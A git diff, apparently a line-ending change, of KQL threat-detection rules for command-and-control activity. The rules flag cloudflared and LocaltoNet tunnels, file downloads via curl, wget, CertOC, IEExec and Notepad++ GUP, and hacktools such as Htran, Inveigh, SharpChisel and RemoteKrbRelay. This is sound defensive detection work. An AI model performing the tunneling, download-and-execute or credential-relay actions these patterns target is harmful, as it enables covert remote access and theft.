"b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7" or SHA256 startswith "f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75" or SHA256 startswith "b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6" or SHA256 startswith "f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688" or SHA256 startswith "d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f" or SHA256 startswith "d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663" or SHA256 startswith "2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77" or SHA256 startswith "19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078")) and ((ProcessCommandLine contains "-url" and ProcessCommandLine contains "tunnel") or (ProcessCommandLine contains ".exe -url" or ProcessCommandLine contains ".exe --url"))) or (ProcessCommandLine contains "-url" and ProcessCommandLine contains 
"-no-autoupdate")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql b/KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql
index a3a203ff..5eef217c 100644
--- a/KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql
+++ b/KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql
@@ -1,12 +1,12 @@
-// Title: Cloudflared Tunnel Connections Cleanup
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-17
-// Level: medium
-// Description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1102, attack.t1090, attack.t1572
-// False Positives:
-// - Legitimate usage of Cloudflared.
-
-DeviceProcessEvents
+// Title: Cloudflared Tunnel Connections Cleanup
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-17
+// Level: medium
+// Description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102, attack.t1090, attack.t1572
+// False Positives:
+// - Legitimate usage of Cloudflared.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-config " or ProcessCommandLine contains "-connector-id ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains "cleanup ")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/cloudflared_tunnel_execution.kql b/KQL/rules/Command and Control/cloudflared_tunnel_execution.kql
index 391c60ba..491b6dac 100644
--- a/KQL/rules/Command and Control/cloudflared_tunnel_execution.kql
+++ b/KQL/rules/Command and Control/cloudflared_tunnel_execution.kql
@@ -1,12 +1,12 @@
-// Title: Cloudflared Tunnel Execution
-// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-17
-// Level: medium
-// Description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1102, attack.t1090, attack.t1572
-// False Positives:
-// - Legitimate usage of Cloudflared tunnel.
-
-DeviceProcessEvents
+// Title: Cloudflared Tunnel Execution
+// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-17
+// Level: medium
+// Description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102, attack.t1090, attack.t1572
+// False Positives:
+// - Legitimate usage of Cloudflared tunnel.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-config " or ProcessCommandLine contains "-credentials-contents " or ProcessCommandLine contains "-credentials-file " or ProcessCommandLine contains "-token ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains " run ")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql
index fc272418..32346cc3 100644
--- a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql
+++ b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql
@@ -1,14 +1,14 @@
-// Title: Communication To LocaltoNet Tunneling Service Initiated
-// Author: Andreas Braathen (mnemonic.io)
-// Date: 2024-06-17
-// Level: high
-// Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains.
-// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.
-// Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102
-// False Positives:
-// - Legitimate use of the LocaltoNet service.
-
-DeviceNetworkEvents
+// Title: Communication To LocaltoNet Tunneling Service Initiated
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-06-17
+// Level: high
+// Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains.
+// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.
+// Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102
+// False Positives:
+// - Legitimate use of the LocaltoNet service.
+
+DeviceNetworkEvents
 | where RemoteUrl endswith ".localto.net" or RemoteUrl endswith ".localtonet.com"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql
index 30f7151d..47020b41 100644
--- a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql
+++ b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql
@@ -1,14 +1,14 @@
-// Title: Communication To LocaltoNet Tunneling Service Initiated - Linux
-// Author: Andreas Braathen (mnemonic.io)
-// Date: 2024-06-17
-// Level: high
-// Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains.
-// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.
-// Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102
-// False Positives:
-// - Legitimate use of the LocaltoNet service.
-
-DeviceNetworkEvents
+// Title: Communication To LocaltoNet Tunneling Service Initiated - Linux
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-06-17
+// Level: high
+// Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains.
+// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.
+// Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102
+// False Positives:
+// - Legitimate use of the LocaltoNet service.
+
+DeviceNetworkEvents
 | where RemoteUrl endswith ".localto.net" or RemoteUrl endswith ".localtonet.com"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/curl_usage_on_linux.kql b/KQL/rules/Command and Control/curl_usage_on_linux.kql
index ea57bd5a..b8b7fd60 100644
--- a/KQL/rules/Command and Control/curl_usage_on_linux.kql
+++ b/KQL/rules/Command and Control/curl_usage_on_linux.kql
@@ -1,13 +1,13 @@
-// Title: Curl Usage on Linux
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-15
-// Level: low
-// Description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-// False Positives:
-// - Scripts created by developers and admins
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: Curl Usage on Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: low
+// Description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Scripts created by developers and admins
+// - Administrative activity
+
+DeviceProcessEvents
 | where FolderPath endswith "/curl"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql b/KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql
index f6aa8597..e53e2981 100644
--- a/KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql
+++ b/KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql
@@ -1,10 +1,10 @@
-// Title: Download File To Potentially Suspicious Directory Via Wget
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-06-02
-// Level: medium
-// Description: Detects the use of wget to download content to a suspicious directory
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-
-DeviceProcessEvents
+// Title: Download File To Potentially Suspicious Directory Via Wget
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: medium
+// Description: Detects the use of wget to download content to a suspicious directory
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
 | where FolderPath endswith "/wget" and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "/tmp/"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql b/KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql
index 90a1fc9b..d208417f 100644
--- a/KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql
+++ b/KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql
@@ -1,10 +1,10 @@
-// Title: File Download And Execution Via IEExec.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-05-16
-// Level: high
-// Description: Detects execution of the IEExec utility to download and execute files
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-
-DeviceProcessEvents
+// Title: File Download And Execution Via IEExec.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-16
+// Level: high
+// Description: Detects execution of the IEExec utility to download and execute files
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IEExec.exe" or ProcessVersionInfoOriginalFileName =~ "IEExec.exe")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql b/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql
index 181b3812..1eb1bf8c 100644
--- a/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql
+++ b/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql
@@ -1,10 +1,10 @@
-// Title: File Download From Browser Process Via Inline URL
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-01-11
-// Level: medium
-// Description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-
-DeviceProcessEvents
+// Title: File Download From Browser Process Via Inline URL
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-11
+// Level: medium
+// Description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith ".7z" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".txt" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".zip") and ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql b/KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql
index cdcad4ed..94652062 100644
--- a/KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql
+++ b/KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql
@@ -1,10 +1,10 @@
-// Title: File Download From IP Based URL Via CertOC.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-10-18
-// Level: high
-// Description: Detects when a user downloads a file from an IP based URL using CertOC.exe
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.execution, attack.t1105
-
-DeviceProcessEvents
+// Title: File Download From IP Based URL Via CertOC.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-18
+// Level: high
+// Description: Detects when a user downloads a file from an IP based URL using CertOC.exe
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.t1105
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-GetCACAPS" and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql b/KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql
index 63dcdf7c..79f3f0e3 100644
--- a/KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql
+++ b/KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql
@@ -1,12 +1,12 @@
-// Title: File Download Using Notepad++ GUP Utility
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-10
-// Level: high
-// Description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-// False Positives:
-// - Other parent processes other than notepad++ using GUP that are not currently identified
-
-DeviceProcessEvents
+// Title: File Download Using Notepad++ GUP Utility
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-10
+// Level: high
+// Description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Other parent processes other than notepad++ using GUP that are not currently identified
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " -unzipTo " and ProcessCommandLine contains "http") and (FolderPath endswith "\\GUP.exe" or ProcessVersionInfoOriginalFileName =~ "gup.exe")) and (not(InitiatingProcessFolderPath endswith "\\notepad++.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/file_download_via_certoc_exe.kql b/KQL/rules/Command and Control/file_download_via_certoc_exe.kql
index 21f6ab16..c568e3e0 100644
--- a/KQL/rules/Command and Control/file_download_via_certoc_exe.kql
+++ b/KQL/rules/Command and Control/file_download_via_certoc_exe.kql
@@ -1,10 +1,10 @@
-// Title: File Download via CertOC.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-05-16
-// Level: medium
-// Description: Detects when a user downloads a file by using CertOC.exe
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-
-DeviceProcessEvents
+// Title: File Download via CertOC.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-16
+// Level: medium
+// Description: Detects when a user downloads a file by using CertOC.exe
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-GetCACAPS" and ProcessCommandLine contains "http") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/finger_exe_execution.kql b/KQL/rules/Command and Control/finger_exe_execution.kql
index 4094dc43..c5a6bfc0 100644
--- a/KQL/rules/Command and Control/finger_exe_execution.kql
+++ b/KQL/rules/Command and Control/finger_exe_execution.kql
@@ -1,14 +1,14 @@
-// Title: Finger.EXE Execution
-// Author: Florian Roth (Nextron Systems), omkar72, oscd.community
-// Date: 2021-02-24
-// Level: high
-// Description: Detects execution of the "finger.exe" utility.
-// Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon.
-// Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-// False Positives:
-// - Admin activity (unclear what they do nowadays with finger.exe)
-
-DeviceProcessEvents
+// Title: Finger.EXE Execution
+// Author: Florian Roth (Nextron Systems), omkar72, oscd.community
+// Date: 2021-02-24
+// Level: high
+// Description: Detects execution of the "finger.exe" utility.
+// Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon.
+// Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Admin activity (unclear what they do nowadays with finger.exe)
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "finger.exe" or FolderPath endswith "\\finger.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql b/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql
index a55fccd8..68d12ee8 100644
--- a/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql
+++ b/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql
@@ -1,14 +1,14 @@
-// Title: GoToAssist Temporary Installation Artefact
-// Author: frack113
-// Date: 2022-02-13
-// Level: medium
-// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Legitimate use
-
-DeviceFileEvents
+// Title: GoToAssist Temporary Installation Artefact
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceFileEvents
 | where FolderPath contains "\\AppData\\Local\\Temp\\LogMeInInc\\GoToAssist Remote Support Expert\\"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql b/KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql
index 02330050..746643db 100644
--- a/KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql
+++ b/KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql
@@ -1,12 +1,12 @@
-// Title: Gzip Archive Decode Via PowerShell
-// Author: Hieu Tran
-// Date: 2023-03-13
-// Level: medium
-// Description: Detects attempts of decoding encoded Gzip archives via PowerShell.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1132.001
-// False Positives:
-// - Legitimate administrative scripts may use this functionality. Use "ParentImage" in combination with the script names and allowed users and applications to filter legitimate executions
-
-DeviceProcessEvents
+// Title: Gzip Archive Decode Via PowerShell
+// Author: Hieu Tran
+// Date: 2023-03-13
+// Level: medium
+// Description: Detects attempts of decoding encoded Gzip archives via PowerShell.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1132.001
+// False Positives:
+// - Legitimate administrative scripts may use this functionality. Use "ParentImage" in combination with the script names and allowed users and applications to filter legitimate executions
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "GZipStream" and ProcessCommandLine contains "::Decompress"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql b/KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql
index c65ddad2..fc4713e6 100644
--- a/KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql
+++ b/KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - Htran/NATBypass Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-12-27
-// Level: high
-// Description: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1090, attack.s0040
-
-DeviceProcessEvents
+// Title: HackTool - Htran/NATBypass Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-12-27
+// Level: high
+// Description: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090, attack.s0040
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".exe -tran " or ProcessCommandLine contains ".exe -slave ") or (FolderPath endswith "\\htran.exe" or FolderPath endswith "\\lcx.exe")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql b/KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql
index 54836e41..fbb12d87 100644
--- a/KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql
+++ b/KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Inveigh Execution Artefacts
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-24
-// Level: critical
-// Description: Detects the presence and execution of Inveigh via dropped artefacts
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: HackTool - Inveigh Execution Artefacts
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-24
+// Level: critical
+// Description: Detects the presence and execution of Inveigh via dropped artefacts
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath endswith "\\Inveigh-Log.txt" or FolderPath endswith "\\Inveigh-Cleartext.txt" or FolderPath endswith "\\Inveigh-NTLMv1Users.txt" or FolderPath endswith "\\Inveigh-NTLMv2Users.txt" or FolderPath endswith "\\Inveigh-NTLMv1.txt" or FolderPath endswith "\\Inveigh-NTLMv2.txt" or FolderPath endswith "\\Inveigh-FormInput.txt" or FolderPath endswith "\\Inveigh.dll" or FolderPath endswith "\\Inveigh.exe" or FolderPath endswith "\\Inveigh.ps1" or FolderPath endswith "\\Inveigh-Relay.ps1"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql b/KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql
index 5e160de7..77484182 100644
--- a/KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql
+++ b/KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-06-27
-// Level: high
-// Description: Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-27
+// Level: high
+// Description: Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath endswith ":\\windows\\temp\\sam.tmp" or FolderPath endswith ":\\windows\\temp\\sec.tmp" or FolderPath endswith ":\\windows\\temp\\sys.tmp"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql b/KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql
index 3a3ced1f..c3d5e371 100644
--- a/KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql
+++ b/KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - SharpChisel Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-05
-// Level: high
-// Description: Detects usage of the Sharp Chisel via the commandline arguments
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1090.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: HackTool - SharpChisel Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-05
+// Level: high
+// Description: Detects usage of the Sharp Chisel via the commandline arguments
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where FolderPath endswith "\\SharpChisel.exe" or ProcessVersionInfoProductName =~ "SharpChisel"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql b/KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql
index 03be964c..1db7a2b1 100644
--- a/KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql
+++ b/KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - SILENTTRINITY Stager DLL Load
-// Author: Aleksey Potapov, oscd.community
-// Date: 2019-10-22
-// Level: high
-// Description: Detects SILENTTRINITY stager dll loading activity
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1071
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: HackTool - SILENTTRINITY Stager DLL Load
+// Author: Aleksey Potapov, oscd.community
+// Date: 2019-10-22
+// Level: high
+// Description: Detects SILENTTRINITY stager dll loading activity
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where InitiatingProcessVersionInfoFileDescription contains "st2stager"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql b/KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql
index ab5c4a75..a9f6c7d3 100644
--- a/KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql
+++ b/KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - SILENTTRINITY Stager Execution
-// Author: Aleksey Potapov, oscd.community
-// Date: 2019-10-22
-// Level: high
-// Description: Detects SILENTTRINITY stager use via PE metadata
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1071
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: HackTool - SILENTTRINITY Stager Execution
+// Author: Aleksey Potapov, oscd.community
+// Date: 2019-10-22
+// Level: high
+// Description: Detects SILENTTRINITY stager use via PE metadata
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessVersionInfoFileDescription contains "st2stager"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql b/KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql
index 1f59abde..120709f6 100644
--- a/KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql
+++ b/KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql
@@ -1,12 +1,12 @@
-// Title: Hijack Legit RDP Session to Move Laterally
-// Author: Samir Bousseaden
-// Date: 2019-02-21
-// Level: high
-// Description: Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Hijack Legit RDP Session to Move Laterally
+// Author: Samir Bousseaden
+// Date: 2019-02-21
+// Level: high
+// Description: Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder
+// MITRE Tactic: Command and Control
